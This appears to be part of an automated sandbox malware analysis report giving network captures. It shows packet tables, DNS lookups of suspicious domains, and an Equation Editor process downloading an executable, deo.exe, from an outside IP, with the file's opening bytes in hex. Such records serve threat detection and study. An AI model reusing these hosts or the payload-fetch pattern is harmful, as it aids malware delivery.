Oct 13, 2021 20:15:52.958646059 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958661079 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958671093 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.958674908 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.958709955 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.970735073 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.970763922 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.970782042 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.970804930 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.970829010 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.970849991 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.970870972 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.970891953 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.970899105 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.970915079 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.970917940 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.970923901 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.970947981 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.970957041 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.970973015 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.970985889 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.970999002 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971012115 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971024990 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971035957 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971051931 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971061945 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971076012 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971086979 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971106052 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971134901 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971151114 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971162081 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971178055 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971180916 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971199036 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971203089 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971229076 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971230030 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971252918 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971255064 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971277952 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971283913 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971288919 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971318960 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971327066 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971342087 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971343040 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971366882 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971391916 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971395016 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971416950 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971420050 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971442938 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971446037 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971467018 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971472025 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971492052 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971498966 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971514940 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971525908 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971539021 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971550941 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971563101 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971575975 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971592903 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971610069 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971617937 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971635103 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971647024 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971661091 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971671104 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971685886 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971698999 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971714973 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971736908 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971744061 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971761942 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971767902 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971786976 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971792936 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971812010 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971818924 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971836090 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971843004 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971860886 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971868038 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971888065 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971894979 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971910954 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971923113 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971935034 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971950054 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971961021 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.971975088 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.971998930 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972012997 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972024918 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972038984 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972052097 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972063065 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972076893 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972085953 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972103119 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972110987 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972131014 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972142935 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972157001 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972166061 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972183943 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972196102 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972209930 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972217083 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972234964 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972244024 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972260952 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972271919 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972285986 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972295046 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972311974 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972316980 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972340107 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972351074 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972368002 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972376108 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972393036 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.972403049 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972426891 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.972662926 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973346949 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973416090 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973438978 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973462105 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973480940 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973485947 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973510981 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973515034 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973531961 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973536968 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973543882 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973563910 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973577023 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973588943 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973611116 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973617077 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973622084 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973643064 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973654032 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973668098 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973692894 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973692894 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973716021 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973717928 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973742008 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973742008 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973764896 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973771095 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973788023 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973819971 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.973820925 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.973856926 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.976296902 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.976334095 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.976371050 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.976396084 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.976402998 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.976418018 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.976418972 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.976428032 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.976452112 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.976502895 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.976526022 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.976543903 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.976550102 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.976555109 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.976577044 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.976587057 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.976602077 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.976603031 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.976627111 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.976648092 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.976650953 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.976670027 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.976672888 CEST	80	49165	18.197.254.181	192.168.2.22
Oct 13, 2021 20:15:52.976681948 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.976697922 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.977601051 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:52.988027096 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:15:54.026457071 CEST	49165	80	192.168.2.22	18.197.254.181
Oct 13, 2021 20:17:07.071927071 CEST	49166	80	192.168.2.22	45.39.212.162
Oct 13, 2021 20:17:07.241837025 CEST	80	49166	45.39.212.162	192.168.2.22
Oct 13, 2021 20:17:07.242121935 CEST	49166	80	192.168.2.22	45.39.212.162
Oct 13, 2021 20:17:07.242702007 CEST	49166	80	192.168.2.22	45.39.212.162
Oct 13, 2021 20:17:07.413518906 CEST	80	49166	45.39.212.162	192.168.2.22
Oct 13, 2021 20:17:07.413549900 CEST	80	49166	45.39.212.162	192.168.2.22
Oct 13, 2021 20:17:07.413727999 CEST	49166	80	192.168.2.22	45.39.212.162
Oct 13, 2021 20:17:07.413840055 CEST	49166	80	192.168.2.22	45.39.212.162
Oct 13, 2021 20:17:07.583570957 CEST	80	49166	45.39.212.162	192.168.2.22
Oct 13, 2021 20:17:12.457608938 CEST	49167	80	192.168.2.22	108.170.14.102
Oct 13, 2021 20:17:12.629852057 CEST	80	49167	108.170.14.102	192.168.2.22
Oct 13, 2021 20:17:12.629992962 CEST	49167	80	192.168.2.22	108.170.14.102
Oct 13, 2021 20:17:12.630357981 CEST	49167	80	192.168.2.22	108.170.14.102
Oct 13, 2021 20:17:12.801696062 CEST	80	49167	108.170.14.102	192.168.2.22
Oct 13, 2021 20:17:12.802043915 CEST	80	49167	108.170.14.102	192.168.2.22
Oct 13, 2021 20:17:12.802081108 CEST	80	49167	108.170.14.102	192.168.2.22
Oct 13, 2021 20:17:12.802453995 CEST	49167	80	192.168.2.22	108.170.14.102
Oct 13, 2021 20:17:12.802576065 CEST	49167	80	192.168.2.22	108.170.14.102
Oct 13, 2021 20:17:12.973977089 CEST	80	49167	108.170.14.102	192.168.2.22
Oct 13, 2021 20:17:25.425744057 CEST	49169	80	192.168.2.22	34.102.136.180
Oct 13, 2021 20:17:25.443773031 CEST	80	49169	34.102.136.180	192.168.2.22
Oct 13, 2021 20:17:25.443856001 CEST	49169	80	192.168.2.22	34.102.136.180
Oct 13, 2021 20:17:25.444068909 CEST	49169	80	192.168.2.22	34.102.136.180
Oct 13, 2021 20:17:25.462517977 CEST	80	49169	34.102.136.180	192.168.2.22
Oct 13, 2021 20:17:25.557760954 CEST	80	49169	34.102.136.180	192.168.2.22
Oct 13, 2021 20:17:25.557856083 CEST	80	49169	34.102.136.180	192.168.2.22
Oct 13, 2021 20:17:25.557979107 CEST	49169	80	192.168.2.22	34.102.136.180
Oct 13, 2021 20:17:25.558032036 CEST	49169	80	192.168.2.22	34.102.136.180
Oct 13, 2021 20:17:25.578491926 CEST	80	49169	34.102.136.180	192.168.2.22
Oct 13, 2021 20:17:30.584640026 CEST	49170	80	192.168.2.22	34.102.136.180
Oct 13, 2021 20:17:30.602279902 CEST	80	49170	34.102.136.180	192.168.2.22
Oct 13, 2021 20:17:30.602374077 CEST	49170	80	192.168.2.22	34.102.136.180
Oct 13, 2021 20:17:30.602564096 CEST	49170	80	192.168.2.22	34.102.136.180
Oct 13, 2021 20:17:30.620251894 CEST	80	49170	34.102.136.180	192.168.2.22
Oct 13, 2021 20:17:30.718043089 CEST	80	49170	34.102.136.180	192.168.2.22
Oct 13, 2021 20:17:30.718076944 CEST	80	49170	34.102.136.180	192.168.2.22
Oct 13, 2021 20:17:30.718225956 CEST	49170	80	192.168.2.22	34.102.136.180
Oct 13, 2021 20:17:30.718291998 CEST	49170	80	192.168.2.22	34.102.136.180
Oct 13, 2021 20:17:30.737838984 CEST	80	49170	34.102.136.180	192.168.2.22
Oct 13, 2021 20:17:35.752099991 CEST	49171	80	192.168.2.22	172.67.213.229
Oct 13, 2021 20:17:35.768112898 CEST	80	49171	172.67.213.229	192.168.2.22
Oct 13, 2021 20:17:35.773026943 CEST	49171	80	192.168.2.22	172.67.213.229
Oct 13, 2021 20:17:35.773063898 CEST	49171	80	192.168.2.22	172.67.213.229
Oct 13, 2021 20:17:35.790704012 CEST	80	49171	172.67.213.229	192.168.2.22
Oct 13, 2021 20:17:35.798839092 CEST	80	49171	172.67.213.229	192.168.2.22
Oct 13, 2021 20:17:35.799060106 CEST	49171	80	192.168.2.22	172.67.213.229
Oct 13, 2021 20:17:35.799138069 CEST	80	49171	172.67.213.229	192.168.2.22
Oct 13, 2021 20:17:35.799217939 CEST	49171	80	192.168.2.22	172.67.213.229
Oct 13, 2021 20:17:35.814909935 CEST	80	49171	172.67.213.229	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 20:17:07.031924963 CEST	52167	53	192.168.2.22	8.8.8.8
Oct 13, 2021 20:17:07.055233002 CEST	53	52167	8.8.8.8	192.168.2.22
Oct 13, 2021 20:17:12.415544987 CEST	50591	53	192.168.2.22	8.8.8.8
Oct 13, 2021 20:17:12.456072092 CEST	53	50591	8.8.8.8	192.168.2.22
Oct 13, 2021 20:17:17.814043045 CEST	57805	53	192.168.2.22	8.8.8.8
Oct 13, 2021 20:17:18.063297987 CEST	53	57805	8.8.8.8	192.168.2.22
Oct 13, 2021 20:17:25.404551029 CEST	59030	53	192.168.2.22	8.8.8.8
Oct 13, 2021 20:17:25.424546957 CEST	53	59030	8.8.8.8	192.168.2.22
Oct 13, 2021 20:17:30.561172962 CEST	59185	53	192.168.2.22	8.8.8.8
Oct 13, 2021 20:17:30.583506107 CEST	53	59185	8.8.8.8	192.168.2.22
Oct 13, 2021 20:17:35.726414919 CEST	55616	53	192.168.2.22	8.8.8.8
Oct 13, 2021 20:17:35.747865915 CEST	53	55616	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 13, 2021 20:17:07.031924963 CEST	192.168.2.22	8.8.8.8	0x8eb8	Standard query (0)	www.ahljsm.com	A (IP address)	IN (0x0001)
Oct 13, 2021 20:17:12.415544987 CEST	192.168.2.22	8.8.8.8	0xc18c	Standard query (0)	www.publicationsplace.com	A (IP address)	IN (0x0001)
Oct 13, 2021 20:17:17.814043045 CEST	192.168.2.22	8.8.8.8	0xfc43	Standard query (0)	www.dbe648.com	A (IP address)	IN (0x0001)
Oct 13, 2021 20:17:25.404551029 CEST	192.168.2.22	8.8.8.8	0x9c63	Standard query (0)	www.upinmyfeels.com	A (IP address)	IN (0x0001)
Oct 13, 2021 20:17:30.561172962 CEST	192.168.2.22	8.8.8.8	0x30e0	Standard query (0)	www.lacucinadesign.com	A (IP address)	IN (0x0001)
Oct 13, 2021 20:17:35.726414919 CEST	192.168.2.22	8.8.8.8	0x9037	Standard query (0)	www.restaurant-utopia.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 13, 2021 20:17:07.055233002 CEST	8.8.8.8	192.168.2.22	0x8eb8	No error (0)	www.ahljsm.com		45.39.212.162	A (IP address)	IN (0x0001)
Oct 13, 2021 20:17:12.456072092 CEST	8.8.8.8	192.168.2.22	0xc18c	No error (0)	www.publicationsplace.com	emailforts.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 20:17:12.456072092 CEST	8.8.8.8	192.168.2.22	0xc18c	No error (0)	emailforts.com		108.170.14.102	A (IP address)	IN (0x0001)
Oct 13, 2021 20:17:18.063297987 CEST	8.8.8.8	192.168.2.22	0xfc43	Name error (3)	www.dbe648.com	none	none	A (IP address)	IN (0x0001)
Oct 13, 2021 20:17:25.424546957 CEST	8.8.8.8	192.168.2.22	0x9c63	No error (0)	www.upinmyfeels.com	upinmyfeels.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 20:17:25.424546957 CEST	8.8.8.8	192.168.2.22	0x9c63	No error (0)	upinmyfeels.com		34.102.136.180	A (IP address)	IN (0x0001)
Oct 13, 2021 20:17:30.583506107 CEST	8.8.8.8	192.168.2.22	0x30e0	No error (0)	www.lacucinadesign.com	lacucinadesign.com		CNAME (Canonical name)	IN (0x0001)
Oct 13, 2021 20:17:30.583506107 CEST	8.8.8.8	192.168.2.22	0x30e0	No error (0)	lacucinadesign.com		34.102.136.180	A (IP address)	IN (0x0001)
Oct 13, 2021 20:17:35.747865915 CEST	8.8.8.8	192.168.2.22	0x9037	No error (0)	www.restaurant-utopia.xyz		172.67.213.229	A (IP address)	IN (0x0001)
Oct 13, 2021 20:17:35.747865915 CEST	8.8.8.8	192.168.2.22	0x9037	No error (0)	www.restaurant-utopia.xyz		104.21.35.47	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

18.197.254.181

www.ahljsm.com

www.publicationsplace.com

www.upinmyfeels.com

www.lacucinadesign.com

www.restaurant-utopia.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	18.197.254.181	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:15:52.835145950 CEST	0	OUT	GET /www1/deo.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 18.197.254.181 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	18.197.254.181	80	192.168.2.22	49165	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 20:15:52.855649948 CEST	1	IN	HTTP/1.1 200 OK Date: Wed, 13 Oct 2021 18:15:52 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7 Last-Modified: Wed, 13 Oct 2021 09:32:48 GMT ETag: "73c00-5ce38a52a9832" Accept-Ranges: bytes Content-Length: 474112 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 a5 66 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 aa 05 00 00 90 01 00 00 00 00 00 9e c9 05 00 00 20 00 00 00 e0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c c9 05 00 4f 00 00 00 00 e0 05 00 94 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 a9 05 00 00 20 00 00 00 aa 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 94 8c 01 00 00 e0 05 00 00 8e 01 00 00 ac 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 07 00 00 02 00 00 00 3a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 c9 05 00 00 00 00 00 48 00 00 00 02 00 05 00 4c 62 00 00 70 4f 00 00 03 00 00 00 59 00 00 06 bc b1 00 00 90 17 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 56 00 00 00 00 00 00 00 02 1e 7d 01 00 00 04 02 1f 2a 1f 2a 73 15 00 00 0a 7d 02 00 00 04 02 16 7d 03 00 00 04 02 14 7d 04 00 00 04 02 28 16 00 00 0a 00 00 02 28 09 00 00 06 00 02 7b 07 00 00 04 72 01 00 00 70 6f 17 00 00 0a 00 02 7b 09 00 00 04 72 05 00 00 70 6f 17 00 00 0a 00 2a 00 00 1b 30 06 00 fd 01 00 00 01 00 00 11 00 02 03 28 18 00 00 0a 